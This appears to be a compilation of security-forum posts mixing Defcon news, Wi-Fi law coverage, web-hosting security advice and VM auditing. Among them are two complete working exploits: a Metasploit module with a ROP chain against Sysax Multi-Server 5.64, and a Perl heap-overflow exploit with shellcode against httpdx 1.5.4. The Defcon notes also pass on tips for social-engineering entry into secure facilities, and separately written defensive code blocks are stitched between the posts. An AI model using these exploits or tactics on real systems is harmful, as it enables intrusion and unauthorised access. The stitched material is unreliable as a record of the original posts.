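                VlanId     = $vlan.AccessVlanId
                Findings   = ($findings -join '; ')
            }
        }
    }
}

Get-HostVMAudit | Format-Table -AutoSize
```

Run the audit function from a scheduled task on every Host and feed the rows with a non-empty Findings column to the SIEM; a VM that appears on a Host without a matching change record is exactly the proliferation case the section describes.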
Finally, work with your engineers to get their buy-in. Proliferation risk is manageable with the right procedures, controls, and attitudes in place.

Conclusion
Virtualization is a significant addition to business productivity tools. It provides flexibility, resiliency, and quick IT reaction times when business needs arise. In many ways, the same security policies apply to VMs and physical servers, but there are a few differences. Segregate administrative roles and control access to VM files based on least privilege. This might be difficult for small IT shops, but make every effort to ensure physical server, management operating system, and VM administration are not performed by the same person. Include archived VMs in your patching process. Treat them like running servers. Keeping them patched prevents surprises when you start them after a few months without critical security patches. Use physical and virtual network segmentation to restrict traffic and access. This includes using virtual switches to segregate VMs on the same Host. Finally, control VM proliferation. Integrate VM creation, start-up, and shutdown activities into your change management and network monitoring processes. Source
-
Freak incident leads to cell phone battery lighting a real fire under a man's backside. Hotel room key-card saves him. LAS VEGAS -- A cell phone battery spontaneously caught fire today, burned through a Defcon attendee's back pants pocket, and fell on the floor, creating burn spots on a carpet and leaving a burn-hole in the attendee's chair. The man, who asked not to be identified, was not harmed but his trousers were ruined. He told CNET that he was sitting in a session at Defcon around 11:30 a.m. PT when he started to smell something burning and felt some heat underneath him on his seat. He stood up to find that his back left pocket was on fire. "I smelled the burn, the smoke, and I stood up and could literally see flames," he said. "I tried to tap it out (with a hand) and it fell to the floor. It burned right through the backside." The battery, which he said goes with a Droid Bionic smartphone that was not in the pocket, was still burning on the ground. He kicked it and it rolled and burned another spot into the carpet. He then left the room to get help as people around him began taking photos. His derriere probably would have been scorched as well if he hadn't had his plastic hotel room key-card in between him and the battery. "My hotel key saved my butt," he said, laughing. A woman who was taking video of the event for Defcon was seated on a platform about 20 feet away and had a good view of what happened. "I saw something glowing out of the corner of my eye," she said. "A guy's butt was in flames." The rest of the session was canceled and the room was evacuated. The man said he had nothing else in his pocket but the battery and the hotel card key, and that he had no idea why the battery would have started to heat up. CNET did not see the phone and was unable to confirm its make and model. A Motorola representative provided this statement when asked for comment: "Motorola Mobility's priority is the safety of our customers. 
All Motorola products are designed, manufactured, and tested to meet or exceed international and local standards for consumer safety and performance. We will look into this matter immediately." The cause of the overheating remains a mystery. Don Bailey, a mobile expert at Capitol Hill Consultants, said batteries can heat up if the metal leads touch something conductive. "Something as simple as steel wool can cause a short between the leads on a cell phone battery," he said. It could have been a bad battery, or the man could have damaged the battery somehow. But if there was no metal in the pocket at the time, it's likely the culprit was some conductive material, such as steel wool from a brush used to clean metal, that had somehow worked its way into the fibers of his pocket, Bailey said. "It's rare for manufactured batteries like these to have that kind of a failure." Source
-
It looks real, but the URL is a giveaway that the Web page did not originate from the people of The New York Times. An opinion piece that appears to be by former New York Times editor Bill Keller on what appears to be the New York Times Web site is a fake. The editorial urges Visa, Mastercard, and American Express to take a "stand against the use of financial embargos to prohibit supporters from contributing or subscribing to media organizations protected by the First Amendment and free speech laws." The fake op-ed was drafted as a follow-up to a February 2012 op-ed by Keller titled "Wikileaks, A Postscript." The URL for the fake column was a giveaway on what is otherwise a near-perfect replica of a New York Times page. The prank URL: WikiLeaks, a Post Postscript - NYTimes.com An authentic New York Times URL: http://www.nytimes.com/2012/07/29/opinion/ Keller tweeted that the op-ed did not come from his computer, and confirmed the fake to ATD's (AllThingsD's) Peter Kafka. New York Times technology writer Nick Bilton tweeted the fake Keller editorial to his followers, and after learning of the "hall of mirrors" deleted the tweet. This episode exemplifies the old Internet adage, "On the Internet nobody knows you're a dog," and the ease with which a clever prankster can wreak havoc. So far, no one has claimed responsibility for the prank. Source
-
Venue: Rio Hotel and Casino

We reached the Rio Hotel at around 8 am. We thought we did good on time until a nice gentleman came to us and said "It's a 3 hour long line guys!". We however got through the line in about 90 minutes, thanks to the nice staff at Defcon. Once you get through the registration process, you are offered a Defcon badge which is your entry pass to Defcon and a booklet that informs you about the whole Defcon schedule.

Intro to Digital Forensics: Tools and Tactics

This talk by Ripshy and Jacob was mainly directed at people who wanted to get started with Infosec. Before the talk, the authors quickly distributed some Backtrack Live CDs to the public. The talk started with an introduction to the Backtrack distro, telling about the little things like the user/pass for logging in to BT and getting started with network services in BT. The author then mentioned the top 5 tools used in Infosec, which included Nmap, TCPDump, netcat, Ntop and Metasploit. The author then explained all 5 top Infosec tools and their basic usage, by giving examples with screenshots, commands etc.

Cerebral Source Code

This was one of the best talks I have ever been to at Defcon. This talk by Siviak was mainly focussed on Social Engineering. The speaker starts by explaining how simple things like being nice to people can help you get the information you want. The speaker then tells that things like good books and courses for Social Engineering don't exist. To be good at Social Engineering, you have to go out and live the experience, and take a chance whenever possible. The key thing is to motivate people to give you the thing that you want. There is no such thing as an effective Social Engineering technique; it changes by time and even by weather.

One of the funny incidents happened when someone from the audience asked "What is an effective technique to get traffic on your site by Social Networking?" and the speaker replied "PORN." One of the good questions asked was "What is a good Social Engineering technique to gain access to a security facility via Social Engineering?". The speaker Siviak replied by telling that we should always look like we know what we are doing, and that we are supposed to be in the place where we are. If some security guy fires a tough question at you, fire them back! They don't know how to react to such a situation. Don't give their brains time to catch up. Humans are like computers: the more information you give them, the more they will be able to figure things out. We must change things quickly so their brains don't catch up with what's going on. If you want to perform Social Engineering on a specific subject (person) and you don't know what he/she has under his/her desk, how many kids he/she has etc, you are not trying hard enough. These things will help you build a common thread which could help you in obtaining more information from the subject. The talk ended with a last question when someone asked "Do we need to learn psychology in order to perform Social Engineering?" and the speaker replied "No". Overall the talk was very informative and the speaker was very funny, so he kept the audience in a very good mood throughout.

DEF CON 101

This panel was taken by Pyro, Roamer, Lockheed, Alxrogan, Lost and FLipper, who are responsible for organizing many of the events and maintaining the network at Defcon. The talk was mainly focussed on how you could maximize your Defcon experience. The main point made by the organizers was "You get as much out of Defcon as you put into it." They talk about how we should not just attend Defcon talks, but meet and socialize with people. We could just go up to some people, buy them a beer and you never know, that guy might just turn into your best friend. The Defcon organizers tell about how they look forward to this weekend the whole year, and all they want from us is just to listen to the Goons if they have some problem with you. Lockheed then comes up and talks about some of the challenges they face while setting up the Defcon network. The authors then tell us about the Defcon nightlife, some of the events that will be happening in the night, and ask us to attend these events too. The authors conclude by telling us that we should be careful while talking to the media and should ask for the power to edit the article, because you never know what they might publish.

Screw the Planet, Hack the Job!

This talk by Roamer, Lockheed and Alxrogan, who are part of the Defcon staff, tells us how utilizing Defcon can help you find your dream job. One of the best parts of this talk was when someone asked "I know there are potential employers/employees at Defcon. Do you plan to have something like a job fair at Defcon?" and one of the speakers replied "I know what you are talking about, we have people who want to hire at Defcon. But the moment we cross that line and it turns into a job fair, we have lost our credibility."

HF Skiddies SUCK, don't be one. Learn some basic Python.

The speaker King TunA starts by speaking about some of the basic advantages of using Python by giving demos via videos (which weren't possible to see unless you were very close to the screen, but are online on Youtube). The speaker explains how things which can take 200-300 lines of code in other languages could be done in Python in far fewer lines. Finally, the author ends the talk by giving a demo of an HTTP scraper.

Here's a quick video of this year's Defcon badge.

Well, there is more to Defcon than just the talks. It's also about the Defcon nightlife, meetups etc. There was this very good event called "the Summit" being held, which was a fundraiser for the EFF. I went to the hackfest meetup in the Flamingo though. Well, that's it for Defcon day 1. I will be writing about Defcon day 2 and day 3 also. Please let me know if there is something specific about Defcon that you want me to write about. I leave you now with some pictures from the event. Original Article
-
Why do websites get hacked?

Websites get hacked for a bunch of different reasons:

- To plant hidden links to other sites in an attempt to game search engines and raise those sites' rankings
- To plant spyware on your site that will infect your visitors and take over their computers, to make a botnet
- To hijack the server itself and use it to attack other systems
- To send out spam
- To gain access to credit card info or personal identities
- For the pure thrill of vandalism
- Because someone has a grudge against you
- Because somebody is bored, and you made it easy

Many people don't think it will happen to them. Why would somebody hack your web site? Well, as you can see from the list above, lots of reasons that don't have anything to do with you. And it happens all the time. We have seen sites hacked for all the reasons above, except for the credit card/personal identity theft. That's the one that could hurt our customers the most, and so far, small e-tailers have been lucky that there are so many much bigger targets with lax security that this kind of theft is not yet a problem. But it seems inevitable to me that this kind of attack will get much more pervasive as the big targets get harder to compromise.

How do they break in?

There's a whole bunch of different ways to break into your web site. Here are the ones we've seen:

1. FTP password is sniffed at an open wireless point, and the attacker gets full access to upload anything they want to your site.
2. An attacker puts malicious code into a form on your site that attacks the application you're running (WordPress, Joomla), your visitors (a cross-site scripting attack that installs malware on Windows computers), you (tricking your browser into doing some administrative task without you knowing about it), or another site (a "cross-site request forgery", used perhaps to attack a specific banking site and request a wire transfer to a mule).
3. An attacker finds a known vulnerability in the software you're running, or even a library your custom site happens to have available, and uses it to break into the server (or carry out any of the other attacks we listed).
4. An attacker guesses your password, perhaps by finding it at another site they have already attacked, and logs in as you.
5. Your desktop or laptop gets spyware on it, and sends everything you type back to the botnet owner, including your passwords.
6. The attacker finds a vulnerable service running on the server, and uses that to exploit all the sites it hosts.
7. Another site on the same server gets hacked, and the attacker uploads a script that runs on the server and infects every other site.

How does your web host protect you?

In most cases, out of the 7 attacks listed above, typical web hosts protect you from one of these: #6. They do nothing to protect you from any other attack; preventing the rest is entirely up to you.

This is how a service with some level of protection should look:

- We don't run FTP on any of our servers. All server access is through encrypted connections.
- We have limited the applications we support to a single platform (Drupal), with constant widespread review of vulnerable forms, and actively apply updates that affect your site.
- Preventing attacks based on your password getting stolen is not possible. And if your site doesn't use SSL, your administrative password can be sniffed. But even with your password stolen, we protect your site in two ways:
  - Limited access: generally we start you out with less administrative access until you've become comfortable using your site. Not only does this make it easier for you to learn, but it limits the damage that can be done with your account.
  - We've got you covered. We have over-the-top backup systems in multiple locations, with historical backups going back up to 16 months. We take nightly snapshots of your database as well as files, and can restore your site to the way it was 3 days ago, or 2 weeks ago, or a variety of other points. And we have experience extracting just certain bits of content from the backup, selectively restoring what you need.
- We lock down our servers, not even running control panel software or anything not directly needed to support the operation of our customers' sites.
- We maintain all of the sites on our servers, not just yours. You can rest assured that there's not an old WordPress site sharing the server with your site, leaving a wide-open door to infect your site even if you've done everything else right.
- Platform chosen and configured for security. One of the really great features of Drupal is that we can set it up so the web server cannot change the code running the site, because the operating system won't let it. And we can direct files like images, videos, and documents to a specially controlled section of the server where code cannot be run, where files used for an attack are rendered harmless. When set up like this, it's much harder for an attacker to upload a malicious file and gain access to the server. We cannot do this without breaking things with platforms like Joomla, WordPress, or ZenCart, which is one of the reasons we no longer support that software.
- Versioning of the site code. By using version control with cryptographic hashing of all file contents, we can very easily detect if something gets changed, see what those changes are, and very easily undo them.

Sursa
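The last point above, detecting changed site code through cryptographic hashing of every file, is the part of that list a practitioner can reproduce without a hosting provider. The following is an added example, not the provider's tooling and not part of the original post: it builds a SHA-256 manifest of a directory tree, then diffs a later manifest against the baseline to report added, removed and modified files. The directory layout and file contents in demo() are constructed for the demonstration (a two-file stand-in for a Drupal tree), and the tampering it performs is a plain overwrite plus a dropped file, which is exactly the pattern a manifest catches regardless of what the new content is.

```python
"""Added example: SHA-256 file manifest for detecting changes to site code.

Not the hosting provider's code; a stand-alone illustration of the
"versioning with cryptographic hashing" point. Directory names and
contents in demo() are constructed for the demonstration.
"""
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path, chunk: int = 65536) -> str:
    """Hash a file in fixed-size chunks so large assets do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root) -> dict:
    """Map every regular file under root (relative POSIX path) to its SHA-256.

    Symlinks are skipped: hashing their target would let an attacker make a
    planted link look like an unchanged file.
    """
    root = Path(root)
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            manifest[p.relative_to(root).as_posix()] = sha256_file(p)
    return manifest


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Report paths that appeared, disappeared, or whose hash changed."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(k for k in set(baseline) & set(current)
                      if baseline[k] != current[k])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict:
    """Constructed scenario: a small site, a baseline, then one edited file
    and one dropped file, i.e. the change pattern a manifest is meant to catch."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp)
        (site / "sites" / "default").mkdir(parents=True)
        (site / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (site / "sites" / "default" / "settings.php").write_text("<?php $db = 'x'; ?>\n")

        baseline = build_manifest(site)

        # Simulated tampering: overwrite one file, drop a new one.
        (site / "index.php").write_text("<?php echo 'defaced'; ?>\n")
        (site / "sites" / "default" / "cache.php").write_text("<?php // dropped ?>\n")

        return diff_manifests(baseline, build_manifest(site))


if __name__ == "__main__":
    print(demo())
```

In practice the baseline manifest is written at deploy time and stored somewhere the web server account cannot write to; a nightly comparison that turns up anything other than an empty diff is the signal to pull the backup the post describes.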
-
Bypassing Spam Filters Using Homographs By Fady Mohamed Osman www. darkmaster. tk @fady_osman Paper Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/20114.pdf
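The paper linked above is about defeating keyword-based spam filters by substituting visually identical characters from other scripts. As an added example that is not the paper's code and not part of the original post, the block below shows both sides: a naive exact-match filter that a Cyrillic-for-Latin substitution slips past, and a hardened version that folds a small confusables table back to ASCII and flags words mixing scripts. The confusables table is a hand-picked subset written for this example, not the full Unicode confusables list, and the blocklist words and sample messages are constructed.

```python
"""Added example: homograph bypass of a keyword filter, and a hardened filter.

Not code from the linked paper. CONFUSABLES is a small hand-picked subset of
look-alike characters; BLOCKLIST and the sample messages are constructed.
"""
import unicodedata

# Cyrillic and Greek code points that render like Latin lowercase letters (subset).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u04bb": "h", "\u0501": "d", "\u051b": "q", "\u051d": "w",
    "\u03bf": "o", "\u03b1": "a",  # Greek omicron, alpha
}

BLOCKLIST = {"viagra", "casino", "lottery"}


def skeleton(text: str) -> str:
    """Fold text to a comparable form: NFKC (full-width forms, ligatures),
    then map known confusables to ASCII, then case-fold."""
    text = unicodedata.normalize("NFKC", text)
    return "".join(CONFUSABLES.get(ch, ch) for ch in text).casefold()


def mixed_script(word: str) -> bool:
    """True if the letters of one word come from more than one script."""
    scripts = set()
    for ch in word:
        if ch.isalpha():
            # Unicode names start with the script: 'LATIN', 'CYRILLIC', 'GREEK', ...
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return len(scripts) > 1


def naive_filter(message: str) -> bool:
    """Exact-match keyword filter; this is what a homograph bypasses."""
    return any(word.lower() in BLOCKLIST for word in message.split())


def hardened_filter(message: str) -> bool:
    """Match on the folded skeleton, and treat mixed-script words as suspicious."""
    return any(skeleton(word) in BLOCKLIST or mixed_script(word)
               for word in message.split())


# Constructed samples.
PLAIN = "cheap viagra now"
HOMOGRAPH = "cheap v\u0456\u0430gr\u0430 now"   # Latin v, g, r; Cyrillic і, а, а
CLEAN = "quarterly report attached"

if __name__ == "__main__":
    for msg in (PLAIN, HOMOGRAPH, CLEAN):
        print(repr(msg), "naive:", naive_filter(msg), "hardened:", hardened_filter(msg))
```

The mixed-script check is the cheap, table-free half of the defence: legitimate words rarely combine Latin and Cyrillic letters, so a single word that does is worth scoring even when the folded form matches nothing.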
-
I don't understand you people.. we just told you not to post download links for hashes any more, and you go and do exactly that again (a link with an md5).
-
Who do you think is going to sit and brute-force these for you?
-
Sysax Multi-Server 5.64 Create Folder Buffer Overflow

require 'msf/core'
require 'base64'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sysax Multi Server 5.64 Create Folder BoF',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the create folder function
        in Sysax Multi Server 5.64. This issue was fixed in 5.66. You must have
        valid credentials to trigger the vulnerability. Your credentials must also
        have the create folder permission and the HTTP option has to be enabled.
        This module will log into the server, get a SID token and then proceed to
        exploit the server. Successful exploits result in LOCALSYSTEM access.
        This exploit works on XP SP3, and Server 2003 SP1-SP2.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64
          'Craig Freyman @cd1zz',   # original discovery & Metasploit module for 5.50
        ],
      'Version'        => '$Revision:$',
      'References'     =>
        [
          [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update
          [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ],              # 5.50 post
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x2F",
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              'Rop'    => false,
              'Ret'    => 0x77c35459, # push esp # ret [sysaxd.exe]
              'Offset' => 701,
            }
          ],
          [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass',
            {
              'Rop'    => true,
              'Ret'    => 0x77baf605, # pivot
              'Offset' => 701,
              'Nop'    => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'July 29, 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URI', [false, "URI for Multi Server", '/']),
        Opt::RPORT(80),
        OptString.new('SysaxUSER', [ true, "Username" ]),
        OptString.new('SysaxPASS', [ true, "Password" ])
      ], self.class)
  end

  def target_url
    "http://#{rhost}:#{rport}#{datastore['URI']}"
  end

  def create_rop_chain()
    rop_gadgets = []
    # All rop gadgets generated by mona.py
    # Thanks corelanc0d3r for making such a great tool
    if (target == targets[1]) # Windows 2003
      rop_gadgets =
      [
        0x77be3adb, # POP EAX # RETN [msvcrt.dll]
        0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll]
        0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll]
        0x41414141, # Filler (compensate)
        0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll]
        0x77bdb896, # POP EBP # RETN [msvcrt.dll]
        0x77be2265, # & push esp # ret [msvcrt.dll]
        0x77bdeebf, # POP EAX # RETN [msvcrt.dll]
        0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx)
        0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
        0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll]
        0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
        0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx)
        0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
        0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll]
        0x77bcc2ee, # POP ECX # RETN [msvcrt.dll]
        0x77befbb4, # &Writable location [msvcrt.dll]
        0x77bbf75e, # POP EDI # RETN [msvcrt.dll]
        0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
        0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
        0x90909090, # nop
        0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
      ].flatten.pack("V*")
    end
    return rop_gadgets
  end

  def exploit
    user = datastore['SysaxUSER']
    pass = datastore['SysaxPASS']

    # base64 encode the credentials
    encodedcreds = Base64.encode64(user + "\x0a" + pass)
    creds = "fd=" + encodedcreds

    connect

    # Login to get SID value
    print_status "Getting SID from #{target_url}"
    res = send_request_raw({
      'method' => 'POST',
      'uri'    => "#{target_url}/scgi?sid=0&pid=dologin",
      'data'   => creds
    }, 20)

    # parse response for SID token
    sid = res.body.match(/(sid=[A-Z0-9a-z]{40})/)
    print_status "Your " + sid.to_s

    buffer = rand_text(target['Offset'])
    buffer << [target.ret].pack('V')
    if (target['Rop'])
      buffer << [target['Nop']].pack('V') * 16
      buffer << create_rop_chain()
    end
    buffer << make_nops(15)
    buffer << payload.encoded # max 1299 bytes

    # pwnag3 post data
    post_data = "scgi?" + sid.to_s + "&pid=mk_folder2_name1.htm HTTP/1.1\r\n"
    post_data << "Content-Length: 171\r\n\r\n"
    post_data << "-----------------------------1190753071675116720811342231\r\n"
    post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n"
    post_data << buffer + "\r\n"
    post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n"

    referer = "http://" + datastore['RHOST'].to_s + "/scgi?" + sid.to_s + "&pid=mk_folder1_name1.htm"

    send_request_raw({
      'uri'     => "/" + post_data,
      'version' => '1.1',
      'method'  => 'POST',
      'referer' => referer
    })

    handler
    disconnect
  end
end

Sursa
-
httpdx <= 1.5.4 Remote Heap Overflow

#!/usr/bin/perl -w
#======================================================================
# Exploit Title: httpdx <= 1.5.4 Remote Heap Overflow
# Date: 28 July 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://httpdx.sourceforge.net
# Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download
# Version: 1.5.4
# Tested on: WinXP SP1
#======================================================================
# Additional notes:
# -----------------
#
# - During a POST request, httpdx allocates memory with malloc(size+1),
#   where 'size' is actually the value of the "Content-Length" HTTP header.
#   All post-data will then be copied into this area using strncpy(x,y,size2),
#   where 'size2' = "request length" - "header length" (and not Content-Length)
#
# - As httpdx uses its own handler function upon crash, this exploit overwrites
#   the first _VECTORED_EXCEPTION_NODE structure with a pointer to our shellcode.
#
# - The exploit works very often, but not always. In both cases, httpdx crashes
#   after the exploit.
#
# - WinXP SP1
#   0x77ED73B4 --> UnhandledExceptionFilter()
#======================================================================

use strict;
use IO::Socket::INET;

# target
my $host = "127.0.0.1";

# The [perl|php|py|..] page to call during the POST request.
# The page must exist and the extension must be defined in the directive
# "http.handlers = {...}" in httpdx.conf
my $page = "/test.pl";

# Windows XP - SP1 - English
# ---------------------------
# ptr to the first _VECTORED_EXCEPTION_NODE structure = 0x77fc3210 - 4
my $veh_node_addr = 0x77fc320c;
# pointer to our shellcode => 0x00227664 - 8 = 0x0022765c
my $sc_ptr = 0x0022765c;

# shellcode
# (msfvenom -p windows/exec -f perl CMD=calc.exe)
my $shellcode =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" .
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" .
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" .
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" .
"\x65\x78\x65\x00";

# flush after every write
$| = 1;

my $sock = IO::Socket::INET->new("$host:80")
    or die "connect to $host:80 failed: $!";

print $sock "POST $page HTTP/1.0\r\n" .
            "Content-Length: 1023\r\n" .
            "Content-Type: text\r\n" .
            "Host: $host" . "\r\n" .
            "\r\n" .
            # shellcode
            $shellcode .
            # nops (pad the body to 1032 bytes)
            "\x90" x (1032 - length($shellcode)) .
            # VEH addr
            pack('V', $veh_node_addr) .
            # ptr to shellcode
            pack('V', $sc_ptr);

# print the response, if any ...
while (<$sock>) {
    print $_;
}
exit;

Sursa
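The notes in the exploit header describe the root cause: the buffer is sized from the Content-Length header, but the copy is sized from the bytes actually received, so a body longer than the declared length overruns the allocation. The block below is an added example, not httpdx code and not the exploit, that models that mismatch at the request-parsing level and shows the hardened reader a server should use: Content-Length is the upper bound, and a body that exceeds it is rejected rather than copied. The request bytes are constructed for the demonstration, shaped like the one the exploit sends (Content-Length: 1023 with a 1040-byte body).

```python
"""Added example: Content-Length vs actual body length, the mismatch behind the
httpdx overflow. Not httpdx code. The sample request is constructed.
"""
from typing import Dict, Tuple


def split_request(raw: bytes) -> Tuple[Dict[str, str], bytes]:
    """Split a raw HTTP/1.x request into lower-cased headers and the body bytes."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    headers: Dict[str, str] = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return headers, body


def declared_vs_actual(raw: bytes) -> Tuple[int, int]:
    """(Content-Length as declared, body bytes actually present)."""
    headers, body = split_request(raw)
    return int(headers.get("content-length", "0")), len(body)


def vulnerable_copy_size(raw: bytes) -> Tuple[int, int]:
    """Model of the bug: allocation is declared+1, copy length is the real body.
    Returns (allocated, copied); the overflow is the case copied > allocated."""
    declared, actual = declared_vs_actual(raw)
    return declared + 1, actual


def read_body_safely(raw: bytes) -> bytes:
    """Hardened reader: Content-Length is an upper bound, never a hint.
    A body longer than declared is refused instead of being copied or truncated
    silently, and a negative length is treated as malformed."""
    headers, body = split_request(raw)
    declared = int(headers.get("content-length", "0"))
    if declared < 0 or len(body) > declared:
        raise ValueError(f"body is {len(body)} bytes, Content-Length says {declared}")
    return body[:declared]


def rejects(raw: bytes) -> bool:
    """True if the hardened reader refuses the request."""
    try:
        read_body_safely(raw)
    except ValueError:
        return True
    return False


# Constructed request shaped like the exploit's: declared 1023, body 1040
# (payload + padding + two overwritten pointers).
OVERSIZED = (b"POST /test.pl HTTP/1.0\r\n"
             b"Content-Length: 1023\r\n"
             b"Content-Type: text\r\n"
             b"Host: 127.0.0.1\r\n\r\n" + b"A" * 1040)

WELL_FORMED = b"POST /x HTTP/1.0\r\nContent-Length: 3\r\n\r\nabc"

if __name__ == "__main__":
    print("declared/actual:", declared_vs_actual(OVERSIZED))
    print("allocated/copied:", vulnerable_copy_size(OVERSIZED))
    print("hardened reader rejects oversized body:", rejects(OVERSIZED))
```

In C the same rule is `if (received > content_length) reject;` before any `strncpy`/`memcpy`, with the copy bounded by the allocation size rather than by whatever arrived on the socket.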
-
Legal and tech specialists debate whether open Wi-Fi networks should be fair game for sniffing, but they agree that the law is currently unclear on the issue. LAS VEGAS -- Got a Wi-Fi network? If someone, say Google or the government, sniffs your open network, you may think you're legally protected. Don't be so sure. It remains unclear whether the law protects your unencrypted Wi-Fi from interception, because there are differing interpretations and lack of court precedent, Kevin Bankston, senior counsel at the Center for Democracy and Technology, said in a session at Defcon yesterday. The federal wiretap statute prohibits sniffing of contents of communications by a device unless the contents are readily accessible to the general public. If the network is password-protected you're fine. But under the definition of "readily accessible to the general public," unencrypted radio communications may not be covered, Bankston said. Years ago, Congress amended the wiretap law to include protection for unencrypted cordless phone calls because millions of people were relying on them with the expectation of privacy. The courts have not yet issued a similar ruling for Wi-Fi traffic. The question is before the courts in a case involving Google and its Street View cars, which were found to be capturing e-mail, text messages, passwords, and other data as they drove around taking pictures for Street View. During the class-action lawsuit brought against Google, the company argued that because the data was not encrypted, it was not covered by the wiretap law. The plaintiffs argued, and the court agreed, that Wi-Fi is not the type of "radio communication" Congress intended, so Wi-Fi communications may be protected under the wiretap law even if they're not encrypted, Bankston said. Google has appealed the ruling to the Ninth Circuit Court of Appeals. 
Meanwhile, the Federal Communications Commission fined Google $25,000 earlier this year for obstructing its investigation into the Wi-Fi sniffing matter, but the agency was unable to conclude that the company had violated the law, Bankston said. To confuse matters, the law may provide protection for some, but not all, of the wireless spectrum that's used by Wi-Fi router channels. Under one reading of the statute, only channel 11 is fully protected, while certain frequencies in channels 7 through 10 are protected, and channels 1 through 6 are not protected at all, according to Bankston. Bankston says the statute should cover open Wi-Fi networks, but he made it clear that he was not taking an official policy position on the matter. He said he and Matt Blaze, a computer science professor at the University of Pennsylvania, debated the topic to highlight the lack of clarity in the law and to start a discussion about how the law should treat the interception of open Wi-Fi. Both men said they could easily have swapped sides. "The law is a mess," Bankston said. Blaze, who does research involving radio communications interception, argued that creating a strict law could stifle innovation. For instance, it could affect how people use so-called "software-defined" radio, which uses software to select particular signals when they're broadly intercepted, he said. "There are legitimate reasons to intercept radio waves over the air," he said. "Doing what Google did has led to incredibly useful things," such as building out a location database that is an alternative to GPS. Eventually, it won't be an issue, because new routers are shipped with encryption enabled by default. But about one-quarter of the hot spots are still open, Bankston said. The problem is not just that content can be sniffed, but what snoops can do with it. "There is the possibility for mass surveillance" and tying traffic to a specific address, Bankston said. 
So, until this all gets sorted out it's best to use a password to protect your Wi-Fi network, and if you insist on leaving it open, set the router to channel 11. Sursa
-
